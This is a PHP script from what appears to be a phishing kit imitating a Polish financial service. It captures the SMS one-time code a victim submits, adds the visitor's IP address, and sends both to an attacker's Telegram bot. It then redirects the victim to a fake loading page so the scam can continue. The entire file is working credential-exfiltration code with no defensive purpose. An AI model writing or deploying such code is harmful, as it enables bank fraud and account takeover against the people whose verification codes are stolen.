<?php
include '../token.php';

$zabi = getenv("REMOTE_ADDR");
$message = " »✓ #CCPL SMS 🇵🇱\n\n";
$message .= "» SMS 2  : ".$_POST['CODE']."\n";
$message .= "----------- IP Infos -------\n\n";
$message .= "IP       : $zabi\n";
$data = [
    'text' => $message,
    'chat_id' => $chat_id
];

file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data));

header("Location: ../loading3.php");
exit();
?>
